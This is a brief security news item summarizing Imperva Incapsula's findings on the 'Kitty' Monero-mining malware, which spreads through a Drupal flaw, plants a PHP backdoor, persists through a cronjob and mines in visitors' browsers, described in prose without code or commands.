There are a lot of reports regarding various vulnerabilities, ransomwares and malwares which are used by hackers to somehow acquire and mine cryptocurrency. Imperva Incapsula has been inspecting the attacks, and reportedly came across the “Kitty” malware, which is an advanced Monero cryptocurrency miner, utilizing a “webminerpool”, an open source mining software for browsers.
"Kitty" Infection attempt
According to the information published on Imperva Incapsula, when the Kitty bash script is executed, a PHP file named “kdrupal.php” is written to the infected server disc.
The attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability. Next, the script registers a time-based job scheduler (“cronjob”) which periodically re-downloads and executes a bash script from a remote host, every minute, giving the attacker the ability to re-infect the server or quickly change or push updates to the infected servers under their control.
Imperva Incapsula Report
When the hackers access a persistent hold of the server, they install a mining program “kkworker”, which is a Monero miner, which acquires cryptocurrency in the process.
The attackers infect the visitors on the infected web server sites and mine cryptocurrency, and at the end they show a message stating that they are just a "harmless kitty", which does not intend to do any harm.